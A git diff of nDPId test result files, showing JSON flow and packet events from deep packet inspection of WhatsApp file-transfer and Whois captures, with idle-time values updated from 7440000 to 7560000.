+00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":311,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1519924240121,"flow_last_seen":1519924240121,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1519924240121,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49698,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":311,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1519924240121,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1519924240121,"pkt":"XEl5dU5qkLkxKPrKCABFAABAAABAAEAG5oDAqAIduTzYNcIiAbuCj0EnAAAAALDC\/\/+6MAAAAgQFtAEDAwYBAQgKKOd3WAAAAAAEAgAA"} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":312,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1519924240177,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1519924240177,"pkt":"kLkxKPrKXEl5dU5qCABFAAA8AABAAFUG0YS5PNg1wKgCHQG7wiLPr2ypgo9BKKASbTgw1AAAAgQFggQCCAq3hjooKOd3WAEDAwg="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":313,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1519924240182,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1519924240182,"pkt":"XEl5dU5qkLkxKPrKCABFAAA0AABAAEAG5ozAqAIduTzYNcIiAbuCj0Eoz69sqoAQCAXEZQAAAQEICijnd5W3hjoo"} +00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":314,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1519924240121,"flow_last_seen":1519924240183,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1519924240183,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49698,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mmg-fna.whatsapp.net","ja3":"4e1a414c4f4c99097edd2a9a98e336c8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +00963{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":316,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1519924240121,"flow_last_seen":1519924240244,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1519924240244,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49698,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mmg-fna.whatsapp.net","ja3":"4e1a414c4f4c99097edd2a9a98e336c8","ja3s":"96681175a9547081bf3d417f1a572091","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +00706{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":620,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":310,"flow_first_seen":1519924083411,"flow_last_seen":1519924193429,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":183524,"flow_avg_l4_payload_len":592,"midstream":0,"thread_ts_msec":1519924247388,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49674,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"}} +00596{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":620,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":310,"flow_first_seen":1519924240121,"flow_last_seen":1519924247388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":226819,"flow_avg_l4_payload_len":731,"midstream":0,"thread_ts_msec":1519924247388,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49698,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00564{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":620,"source":"whatsappfiles.pcap","alias":"nDPId-test","packets-captured":620,"packets-processed":620,"total-skipped-flows":0,"total-l4-data-len":410343,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":3,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":18,"global_ts_msec":1519924247388} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 620/620 diff --git a/test/results/whois.pcapng.out b/test/results/whois.pcapng.out index ffed45042..522c5c42e 100644 --- a/test/results/whois.pcapng.out +++ b/test/results/whois.pcapng.out @@ -1,26 +1,26 @@ 00458{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"whois.pcapng","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00544{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"whois.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1507397119066} -00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"whois.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1507397119066,"flow_last_seen":1507397119066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1507397119066,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"192.0.47.59","src_port":44188,"dst_port":43,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"whois.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1507397119066,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1507397119066,"pkt":"UlQAEjUCCAAnPqwxCABFAAA8folAAEAGwOgKAAIPwAAvO6ycACuFe1kCAAAAAKACchD7eAAAAgQFtAQCCAqvatNhAAAAAAEDAwY="} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"whois.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1507397119183,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1507397119183,"pkt":"CAAnPqwxUlQAEjUCCABFAAAsSF0AAEAGNyXAAC87CgACDwArrJwAl14BhXtZA2AS\/\/+y7QAAAgQFtAAA"} -00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"whois.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1507397119183,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1507397119183,"pkt":"UlQAEjUCCAAnPqwxCABFAAAofopAAEAGwPsKAAIPwAAvO6ycACuFe1kDAJdeAlAQchD7ZAAA"} -00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"whois.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1507397119066,"flow_last_seen":1507397119183,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":13,"flow_tot_l4_payload_len":13,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1507397119183,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"192.0.47.59","src_port":44188,"dst_port":43,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Whois-DAS","breed":"Acceptable","category":"Network"}} +00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"whois.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1507397119066,"flow_last_seen":1507397119066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1507397119066,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"192.0.47.59","src_port":44188,"dst_port":43,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"whois.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1507397119066,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1507397119066,"pkt":"UlQAEjUCCAAnPqwxCABFAAA8folAAEAGwOgKAAIPwAAvO6ycACuFe1kCAAAAAKACchD7eAAAAgQFtAQCCAqvatNhAAAAAAEDAwY="} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"whois.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1507397119183,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1507397119183,"pkt":"CAAnPqwxUlQAEjUCCABFAAAsSF0AAEAGNyXAAC87CgACDwArrJwAl14BhXtZA2AS\/\/+y7QAAAgQFtAAA"} +00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"whois.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1507397119183,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1507397119183,"pkt":"UlQAEjUCCAAnPqwxCABFAAAofopAAEAGwPsKAAIPwAAvO6ycACuFe1kDAJdeAlAQchD7ZAAA"} +00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"whois.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1507397119066,"flow_last_seen":1507397119183,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":13,"flow_tot_l4_payload_len":13,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1507397119183,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"192.0.47.59","src_port":44188,"dst_port":43,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Whois-DAS","breed":"Acceptable","category":"Network"}} 00549{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":12,"source":"whois.pcapng","alias":"nDPId-test","packets-captured":12,"packets-processed":11,"total-skipped-flows":0,"total-l4-data-len":246,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1604305198454} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"whois.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1604305198454,"flow_last_seen":1604305198454,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1604305198454,"l3_proto":"ip4","src_ip":"10.17.34.139","dst_ip":"10.17.51.8","src_port":64016,"dst_port":4343,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"whois.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1604305198454,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":86,"pkt_l4_len":48,"thread_ts_msec":1604305198454,"pkt":"AAAAAAAAAAgAAAADgQAGQwgARQAAROArQAB5BrfTChEiiwoRMwj6EBD3\/zhGhgAAAADAAvrwy1EAAAIEBWoBAwMIAQEEAkwKAQEKEf5EAAVMBAwhAQA="} -00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"whois.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1604305198454,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":86,"pkt_l4_len":48,"thread_ts_msec":1604305198454,"pkt":"AAAAAAAAAAgAAAADgQAGQwgARQAAROArQAB4BrjTChEiiwoRMwj6EBD3\/zhGhgAAAADAAvrwy1EAAAIEBWoBAwMIAQEEAkwKAQEKEf5EAAVMBAwhAQA="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"whois.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1604305198460,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":70,"pkt_l4_len":32,"thread_ts_msec":1604305198460,"pkt":"AAAAAAAAAAgAAAADgQAGQwgARQAANARIQAB9Bo\/HChEzCAoRIosQ9\/oQPm9gn\/84RoeAEiAA9XQAAAIEBbQBAwMIAQEEAg=="} -01073{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"whois.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1604305198454,"flow_last_seen":1604305198677,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":170,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1604305198677,"l3_proto":"ip4","src_ip":"10.17.34.139","dst_ip":"10.17.51.8","src_port":64016,"dst_port":4343,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"5f48063f9f3a827056ccdabadcc3886a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01276{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"whois.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1604305198454,"flow_last_seen":1604305198690,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1220,"flow_tot_l4_payload_len":1560,"flow_avg_l4_payload_len":222,"midstream":0,"thread_ts_msec":1604305198690,"l3_proto":"ip4","src_ip":"10.17.34.139","dst_ip":"10.17.51.8","src_port":64016,"dst_port":4343,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"5f48063f9f3a827056ccdabadcc3886a","ja3s":"649d6810e8392f63dc311eecb6b7098b","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384","issuerDN":"CN=10.17.51.7","subjectDN":"CN=10.17.51.7, CN=10.17.51.7","alpn":"h2,http\/1.1","fingerprint":"DD:4E:28:9B:08:C1:D5:63:D1:B6:FC:DD:FD:91:A9:D4:E3:A8:7F:D5"}} -00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":19,"source":"whois.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1507397119066,"flow_last_seen":1507397119369,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1604305198690,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"192.0.47.59","src_port":44188,"dst_port":43,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Whois-DAS","breed":"Acceptable","category":"Network"}} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"whois.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1604305198454,"flow_last_seen":1604305198454,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1604305198454,"l3_proto":"ip4","src_ip":"10.17.34.139","dst_ip":"10.17.51.8","src_port":64016,"dst_port":4343,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"whois.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1604305198454,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":86,"pkt_l4_len":48,"thread_ts_msec":1604305198454,"pkt":"AAAAAAAAAAgAAAADgQAGQwgARQAAROArQAB5BrfTChEiiwoRMwj6EBD3\/zhGhgAAAADAAvrwy1EAAAIEBWoBAwMIAQEEAkwKAQEKEf5EAAVMBAwhAQA="} +00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"whois.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1604305198454,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":86,"pkt_l4_len":48,"thread_ts_msec":1604305198454,"pkt":"AAAAAAAAAAgAAAADgQAGQwgARQAAROArQAB4BrjTChEiiwoRMwj6EBD3\/zhGhgAAAADAAvrwy1EAAAIEBWoBAwMIAQEEAkwKAQEKEf5EAAVMBAwhAQA="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"whois.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1604305198460,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":70,"pkt_l4_len":32,"thread_ts_msec":1604305198460,"pkt":"AAAAAAAAAAgAAAADgQAGQwgARQAANARIQAB9Bo\/HChEzCAoRIosQ9\/oQPm9gn\/84RoeAEiAA9XQAAAIEBbQBAwMIAQEEAg=="} +01073{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"whois.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1604305198454,"flow_last_seen":1604305198677,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":170,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1604305198677,"l3_proto":"ip4","src_ip":"10.17.34.139","dst_ip":"10.17.51.8","src_port":64016,"dst_port":4343,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"5f48063f9f3a827056ccdabadcc3886a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01276{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"whois.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1604305198454,"flow_last_seen":1604305198690,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1220,"flow_tot_l4_payload_len":1560,"flow_avg_l4_payload_len":222,"midstream":0,"thread_ts_msec":1604305198690,"l3_proto":"ip4","src_ip":"10.17.34.139","dst_ip":"10.17.51.8","src_port":64016,"dst_port":4343,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"5f48063f9f3a827056ccdabadcc3886a","ja3s":"649d6810e8392f63dc311eecb6b7098b","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384","issuerDN":"CN=10.17.51.7","subjectDN":"CN=10.17.51.7, CN=10.17.51.7","alpn":"h2,http\/1.1","fingerprint":"DD:4E:28:9B:08:C1:D5:63:D1:B6:FC:DD:FD:91:A9:D4:E3:A8:7F:D5"}} +00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":19,"source":"whois.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1507397119066,"flow_last_seen":1507397119369,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1604305198690,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"192.0.47.59","src_port":44188,"dst_port":43,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Whois-DAS","breed":"Acceptable","category":"Network"}} 00551{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":19,"source":"whois.pcapng","alias":"nDPId-test","packets-captured":19,"packets-processed":18,"total-skipped-flows":0,"total-l4-data-len":1806,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":1,"total-updates":0,"current-active-flows":1,"total-active-flows":2,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":16,"global_ts_msec":1623517268690} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"whois.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623517268690,"flow_last_seen":1623517268690,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623517268690,"l3_proto":"ip4","src_ip":"192.30.45.30","dst_ip":"10.160.63.128","src_port":43,"dst_port":53217,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"whois.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1623517268690,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":62,"pkt_l4_len":24,"thread_ts_msec":1623517268690,"pkt":"AAAAAAAAAAsAAAAIgQAHdAgARQAALKUxAAAtBrE+wB4tHgqgP4AAK8\/hR0rdvNStq\/tgEgW05awAAAIEBVA="} -02064{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"whois.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1623517269021,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1258,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":1258,"pkt_l4_len":1220,"thread_ts_msec":1623517269021,"pkt":"AAAAAAAAAAsAAAAIgQAHdAgARQAE2B35AAAtBjPLwB4tHgqgP4AAK8\/hR0rdvdStrBVQGAW0T9cAACAgIERvbWFpbiBOYW1lOiBDWUJFUlBBVFJPTEJELkNPTQ0KICAgUmVnaXN0cnkgRG9tYWluIElEOiAyMTUzNDAwMTAwX0RPTUFJTl9DT00tVlJTTg0KICAgUmVnaXN0cmFyIFdIT0lTIFNlcnZlcjogd2hvaXMuUHVibGljRG9tYWluUmVnaXN0cnkuY29tDQogICBSZWdpc3RyYXIgVVJMOiBodHRwOi8vd3d3LnB1YmxpY2RvbWFpbnJlZ2lzdHJ5LmNvbQ0KICAgVXBkYXRlZCBEYXRlOiAyMDIwLTA4LTI5VDA3OjQxOjUyWg0KICAgQ3JlYXRpb24gRGF0ZTogMjAxNy0wOC0xNFQxNjoxMDo1MVoNCiAgIFJlZ2lzdHJ5IEV4cGlyeSBEYXRlOiAyMDIxLTA4LTE0VDE2OjEwOjUxWg0KICAgUmVnaXN0cmFyOiBQRFIgTHRkLiBkL2IvYSBQdWJsaWNEb21haW5SZWdpc3RyeS5jb20NCiAgIFJlZ2lzdHJhciBJQU5BIElEOiAzMDMNCiAgIFJlZ2lzdHJhciBBYnVzZSBDb250YWN0IEVtYWlsOiBhYnVzZS1jb250YWN0QHB1YmxpY2RvbWFpbnJlZ2lzdHJ5LmNvbQ0KICAgUmVnaXN0cmFyIEFidXNlIENvbnRhY3QgUGhvbmU6ICsxLjIwMTM3NzU5NTINCiAgIERvbWFpbiBTdGF0dXM6IGNsaWVudFRyYW5zZmVyUHJvaGliaXRlZCBodHRwczovL2ljYW5uLm9yZy9lcHAjY2xpZW50V